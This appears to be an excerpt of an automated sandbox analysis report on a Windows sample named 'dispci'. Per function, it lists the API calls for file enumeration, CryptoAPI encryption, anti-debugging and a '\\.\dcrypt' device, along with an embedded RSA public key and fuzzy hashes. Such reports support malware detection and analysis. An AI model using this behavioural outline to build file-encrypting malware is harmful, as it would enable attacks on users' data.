                                              • Instruction Fuzzy Hash: 7531B871B416046BDB24EF64DC46FAAB7B4EB48B10F104599F50A972C0DB71AA418B50
                                              Function 00A81B80 Relevance: 10.7, APIs: 7, Instructions: 159fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PathCombineW.SHLWAPI(?,?,00A95624), ref: 00A81BBF
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A81BDA
                                              • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 00A81C07
                                              • PathCombineW.SHLWAPI(?,?,?), ref: 00A81CB1
                                              • PathFindExtensionW.SHLWAPI(?), ref: 00A81CF2
                                              • FindNextFileW.KERNEL32(?,?), ref: 00A81D3F
                                              • FindClose.KERNEL32(00000000), ref: 00A81D4E
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                              • String ID:
                                              • API String ID: 1251538951-0
                                              • Opcode ID: c28c4b2ec9ed9cff92e9ede846816792924ebb257fa44da79647d52cddaf08a4
                                              • Instruction ID: 968055b6ed06365e9111648b980192dedcd2dab68834c951eb3cc8350f321497
                                              • Opcode Fuzzy Hash: c28c4b2ec9ed9cff92e9ede846816792924ebb257fa44da79647d52cddaf08a4
                                              • Instruction Fuzzy Hash: CE51BCB26042019ADB20EF24CC45BEB73BDAFA5754F044A29E956861A4FB32DA07C791
                                              Function 00A815A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00A815C0
                                              • GetLastError.KERNEL32 ref: 00A815C6
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00A815DD
                                              • CryptDestroyKey.ADVAPI32(?), ref: 00A8162C
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A81638
                                              Strings
                                              • MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX, xrefs: 00A815EB
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$Context$Acquire$DestroyErrorLastRelease
                                              • String ID: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX
                                              • API String ID: 970883721-4244860603
                                              • Opcode ID: 7adbcd5b12812eac4ed374b6b6598530d196c90b0c2cf0063d242f29ca4a2a4c
                                              • Instruction ID: f5da5d062737633bc07b0e0de5455e94e2ace0f4ee5317176963b4d0a1c8f2d2
                                              • Opcode Fuzzy Hash: 7adbcd5b12812eac4ed374b6b6598530d196c90b0c2cf0063d242f29ca4a2a4c
                                              • Instruction Fuzzy Hash: 81118172A00119BBCB10EBA99C44EDE7BBCEF84741F144165F909D7250EA309B068BA0
                                              Function 00A81000 Relevance: 9.1, APIs: 6, Instructions: 52encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 00A8101F
                                              • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A8102D
                                              • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A81040
                                              • LocalAlloc.KERNEL32(00000040,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A81054
                                              • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?), ref: 00A81066
                                              • LocalFree.KERNEL32(00000000,?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004), ref: 00A81069
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: CryptParam$Local$AllocFree
                                              • String ID:
                                              • API String ID: 3966954206-0
                                              • Opcode ID: e2a01674213e9624bd2bbab80bf897aba5581caadc0aa28beb2fca20fb9529de
                                              • Instruction ID: 94eee96f8688b2062f44f23d9bab4f50cb653d136f6d100610583fa754147073
                                              • Opcode Fuzzy Hash: e2a01674213e9624bd2bbab80bf897aba5581caadc0aa28beb2fca20fb9529de
                                              • Instruction Fuzzy Hash: EB014F71B41218BAEB20EB959C86FEEBB7CDF05B50F500196FA04A61D0DBB09F4187B5
                                              Function 00A81160 Relevance: 7.6, APIs: 5, Instructions: 88encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000000), ref: 00A81197
                                              • LocalAlloc.KERNEL32(00000040,000000F0), ref: 00A811A3
                                              • _memmove.LIBCMT ref: 00A811BE
                                              • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,000000F0), ref: 00A811DC
                                              • LocalFree.KERNEL32(?,?,000000F0), ref: 00A811F9
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: CryptEncryptLocal$AllocFree_memmove
                                              • String ID:
                                              • API String ID: 3579331289-0
                                              • Opcode ID: 154705dc0584fe883c4da3b3fee9eb92d1e330ad042f88729ec00caba48a7b47
                                              • Instruction ID: afe8eee65c4b608611d73e8065ca7e44c8b9fc813e3afdee723b68afc0679741
                                              • Opcode Fuzzy Hash: 154705dc0584fe883c4da3b3fee9eb92d1e330ad042f88729ec00caba48a7b47
                                              • Instruction Fuzzy Hash: B0216276741225ABDB20DF99DC45FABB7ACEB86761F100256FD08D7340EA719D0187E0
                                              Function 00A85C9F Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 00A8681A
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A8682F
                                              • UnhandledExceptionFilter.KERNEL32(00A93688), ref: 00A8683A
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00A86856
                                              • TerminateProcess.KERNEL32(00000000), ref: 00A8685D
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID:
                                              • API String ID: 2579439406-0
                                              • Opcode ID: 02307287b8a9912cd2d999c6a56859be103c73118ca5269e33d60d28c759e553
                                              • Instruction ID: f538e60e0486fd88b37ec98fe14a0e864c46bc5d2cc0f5be37abd620975d1a04
                                              • Opcode Fuzzy Hash: 02307287b8a9912cd2d999c6a56859be103c73118ca5269e33d60d28c759e553
                                              • Instruction Fuzzy Hash: D321C475612204ABDB15DFADEC8569A3BB4BB48310F10801FE90886270EF755A82CF55
                                              Function 00A81220 Relevance: 6.1, APIs: 4, Instructions: 62encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptBinaryToStringW.CRYPT32(?,?,00000001,00000000,?), ref: 00A81236
                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00000001,00000000,?), ref: 00A81249
                                              • CryptBinaryToStringW.CRYPT32(?,?,00000001,00000000,?), ref: 00A8125E
                                              • LocalFree.KERNEL32(00000000,?,?,00000001,00000000,?,?,?,?,00000001,00000000,?), ref: 00A81276
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: BinaryCryptLocalString$AllocFree
                                              • String ID:
                                              • API String ID: 4291131564-0
                                              • Opcode ID: 8aeed79f13f6ed67fdefae3cf907281f1428b337bfdf9f9455c2b59db54eb118
                                              • Instruction ID: 08a1f0f3659c5c302b55a9f6b11ae83aa1f5c159028bdc2fce5ecd260de499a2
                                              • Opcode Fuzzy Hash: 8aeed79f13f6ed67fdefae3cf907281f1428b337bfdf9f9455c2b59db54eb118
                                              • Instruction Fuzzy Hash: 95014477701118B7CB20DB9AAC45DEBB7ADDBC5761B1001ABFD08D7210EA718E1296E0
                                              Function 00A81D70 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00A81D8D
                                              • CryptHashData.ADVAPI32(?,?,00000021,00000000), ref: 00A81DA2
                                              • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?), ref: 00A81DBC
                                              • CryptDestroyHash.ADVAPI32(?), ref: 00A81DC8
                                                • Part of subcall function 00A81000: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 00A8101F
                                                • Part of subcall function 00A81000: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A8102D
                                                • Part of subcall function 00A81000: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A81040
                                                • Part of subcall function 00A81000: LocalAlloc.KERNEL32(00000040,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A81054
                                                • Part of subcall function 00A81000: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?), ref: 00A81066
                                                • Part of subcall function 00A81000: LocalFree.KERNEL32(00000000,?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004), ref: 00A81069
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                              • String ID:
                                              • API String ID: 797921460-0
                                              • Opcode ID: 8705d2888c6c3de6377ec8ae2cc60855e41585fd9ce5f0c5f75727f89c6648fc
                                              • Instruction ID: 918f2f8784d6b10b6aa2d12eb3cc3add7127503bb620a046458162a461a7ed0f
                                              • Opcode Fuzzy Hash: 8705d2888c6c3de6377ec8ae2cc60855e41585fd9ce5f0c5f75727f89c6648fc
                                              • Instruction Fuzzy Hash: D8019672700204BBD620DBD6DD49E5BF7BCFBC4751B100159F609D3140DA71AE01C7A0
                                              Function 00A812A0 Relevance: 6.0, APIs: 4, Instructions: 48encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00A812B7
                                              • GetLastError.KERNEL32 ref: 00A812C1
                                              • CryptGenRandom.ADVAPI32(?,00000021), ref: 00A812D5
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A812E3
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                              • String ID:
                                              • API String ID: 2963463078-0
                                              • Opcode ID: d2a396055bf4a8b831d2db37353f75950fe894d8bd08949744eb8c290a59d3fe
                                              • Instruction ID: 097891879c0e84eceac0053c65baf9b29b24fc684b17750ca6156838d26b4883
                                              • Opcode Fuzzy Hash: d2a396055bf4a8b831d2db37353f75950fe894d8bd08949744eb8c290a59d3fe
                                              • Instruction Fuzzy Hash: 1301D4363002846AEB34D7AA9C48F6BBBBDEB89700F20419DF549C7151E9718A03D720
                                              Function 00A83FC0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                              • CallNextHookEx.USER32(00030072,00000000,?,?), ref: 00A8404B
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$CallControlCreateDeviceErrorFileHookLastNext
                                              • String ID:
                                              • API String ID: 508842537-0
                                              • Opcode ID: 1d85a04890fcc9350089b7ac21431c2f7de470d5f67bf78ad9be0f2b7d84c095
                                              • Instruction ID: 1d1c6198dfe2e27b8fa79ac57ff8a43ed1bcdc06ac9e80bb5a3fa6bc0ebc9e4e
                                              • Opcode Fuzzy Hash: 1d85a04890fcc9350089b7ac21431c2f7de470d5f67bf78ad9be0f2b7d84c095
                                              • Instruction Fuzzy Hash: 3511A371B002199FDB00EFA5E884AAFBBB4EB58310F11442FE90597251DA349941CBE1
                                              Function 00A84950 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 191threadtimewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00A861C0: __lock.LIBCMT ref: 00A861CE
                                                • Part of subcall function 00A861C0: __getch_nolock.LIBCMT ref: 00A861D8
                                              • GetDesktopWindow.USER32 ref: 00A849C3
                                              • GetForegroundWindow.USER32 ref: 00A849CB
                                              • GetShellWindow.USER32 ref: 00A849D7
                                              • GetCapture.USER32 ref: 00A849E3
                                              • GetClipboardOwner.USER32 ref: 00A849EF
                                              • GetOpenClipboardWindow.USER32 ref: 00A849FB
                                              • GetCurrentProcessId.KERNEL32 ref: 00A84A07
                                              • GetCurrentThreadId.KERNEL32 ref: 00A84A13
                                              • GetTickCount.KERNEL32 ref: 00A84A1F
                                              • GetFocus.USER32 ref: 00A84A2B
                                              • GetActiveWindow.USER32 ref: 00A84A37
                                              • GetKBCodePage.USER32 ref: 00A84A43
                                              • GetCursor.USER32 ref: 00A84A4F
                                              • GetLastActivePopup.USER32(?), ref: 00A84A62
                                              • GetProcessHeap.KERNEL32 ref: 00A84A6E
                                              • GetQueueStatus.USER32(000004BF), ref: 00A84A7F
                                              • GetInputState.USER32 ref: 00A84A8B
                                              • GetMessageTime.USER32 ref: 00A84A97
                                              • GetOEMCP.KERNEL32 ref: 00A84AA3
                                              • GetCursorInfo.USER32(?), ref: 00A84ACE
                                              • GetCaretPos.USER32(?), ref: 00A84ADB
                                              • GetCurrentThread.KERNEL32 ref: 00A84AFD
                                              • GetThreadTimes.KERNEL32(00000000), ref: 00A84B04
                                              • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00A84B23
                                              • GetProcessTimes.KERNEL32(00000000), ref: 00A84B26
                                              • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00A84B32
                                              • GetProcessMemoryInfo.PSAPI(00000000), ref: 00A84B35
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A84B3F
                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00A84B49
                                              • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00A84BAD
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows__getch_nolock__lock
                                              • String ID: ($@
                                              • API String ID: 2217453591-1311469180
                                              • Opcode ID: c349746f27e423d925a673ec322d2482570189ba96f6ae8a488ef2e303e43aad
                                              • Instruction ID: fa6a3197dfde152b61269fd43e475894f6fc1ed12e70447ca80c90ad4237feed
                                              • Opcode Fuzzy Hash: c349746f27e423d925a673ec322d2482570189ba96f6ae8a488ef2e303e43aad
                                              • Instruction Fuzzy Hash: A98118B6E012299FDF20EFA4DD48BDDBBB4FB18301F00459AE549A7250DB349A89CF51
                                              Function 00A849A8 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 153threadtimewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00A849C3
                                              • GetForegroundWindow.USER32 ref: 00A849CB
                                              • GetShellWindow.USER32 ref: 00A849D7
                                              • GetCapture.USER32 ref: 00A849E3
                                              • GetClipboardOwner.USER32 ref: 00A849EF
                                              • GetOpenClipboardWindow.USER32 ref: 00A849FB
                                              • GetCurrentProcessId.KERNEL32 ref: 00A84A07
                                              • GetCurrentThreadId.KERNEL32 ref: 00A84A13
                                              • GetTickCount.KERNEL32 ref: 00A84A1F
                                              • GetFocus.USER32 ref: 00A84A2B
                                              • GetActiveWindow.USER32 ref: 00A84A37
                                              • GetKBCodePage.USER32 ref: 00A84A43
                                              • GetCursor.USER32 ref: 00A84A4F
                                              • GetLastActivePopup.USER32(?), ref: 00A84A62
                                              • GetProcessHeap.KERNEL32 ref: 00A84A6E
                                              • GetQueueStatus.USER32(000004BF), ref: 00A84A7F
                                              • GetInputState.USER32 ref: 00A84A8B
                                              • GetMessageTime.USER32 ref: 00A84A97
                                              • GetOEMCP.KERNEL32 ref: 00A84AA3
                                              • GetCursorInfo.USER32(?), ref: 00A84ACE
                                              • GetCaretPos.USER32(?), ref: 00A84ADB
                                              • GetCurrentThread.KERNEL32 ref: 00A84AFD
                                              • GetThreadTimes.KERNEL32(00000000), ref: 00A84B04
                                              • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00A84B23
                                              • GetProcessTimes.KERNEL32(00000000), ref: 00A84B26
                                              • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00A84B32
                                              • GetProcessMemoryInfo.PSAPI(00000000), ref: 00A84B35
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A84B3F
                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00A84B49
                                              • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00A84BAD
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                              • String ID: ($@
                                              • API String ID: 3079641271-1311469180
                                              • Opcode ID: ccaf2fcbae60df9881fcaf470cb5c87a4420044cd90585580c88ca218f2cc373
                                              • Instruction ID: 3b287a9f2efd30bd7ca60d4f9948438a58d86e82837755d52edcce7793360da8
                                              • Opcode Fuzzy Hash: ccaf2fcbae60df9881fcaf470cb5c87a4420044cd90585580c88ca218f2cc373
                                              • Instruction Fuzzy Hash: 2761C676E002299FDF20EFB0DD4DBDDBBB4BB18301F00459AE54AA7251DB349A898F51
                                              Function 00A849A6 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 152threadtimewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00A849C3
                                              • GetForegroundWindow.USER32 ref: 00A849CB
                                              • GetShellWindow.USER32 ref: 00A849D7
                                              • GetCapture.USER32 ref: 00A849E3
                                              • GetClipboardOwner.USER32 ref: 00A849EF
                                              • GetOpenClipboardWindow.USER32 ref: 00A849FB
                                              • GetCurrentProcessId.KERNEL32 ref: 00A84A07
                                              • GetCurrentThreadId.KERNEL32 ref: 00A84A13
                                              • GetTickCount.KERNEL32 ref: 00A84A1F
                                              • GetFocus.USER32 ref: 00A84A2B
                                              • GetActiveWindow.USER32 ref: 00A84A37
                                              • GetKBCodePage.USER32 ref: 00A84A43
                                              • GetCursor.USER32 ref: 00A84A4F
                                              • GetLastActivePopup.USER32(?), ref: 00A84A62
                                              • GetProcessHeap.KERNEL32 ref: 00A84A6E
                                              • GetQueueStatus.USER32(000004BF), ref: 00A84A7F
                                              • GetInputState.USER32 ref: 00A84A8B
                                              • GetMessageTime.USER32 ref: 00A84A97
                                              • GetOEMCP.KERNEL32 ref: 00A84AA3
                                              • GetCursorInfo.USER32(?), ref: 00A84ACE
                                              • GetCaretPos.USER32(?), ref: 00A84ADB
                                              • GetCurrentThread.KERNEL32 ref: 00A84AFD
                                              • GetThreadTimes.KERNEL32(00000000), ref: 00A84B04
                                              • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00A84B23
                                              • GetProcessTimes.KERNEL32(00000000), ref: 00A84B26
                                              • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00A84B32
                                              • GetProcessMemoryInfo.PSAPI(00000000), ref: 00A84B35
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A84B3F
                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00A84B49
                                              • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00A84BAD
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Strings
                                              Memory Dump Source
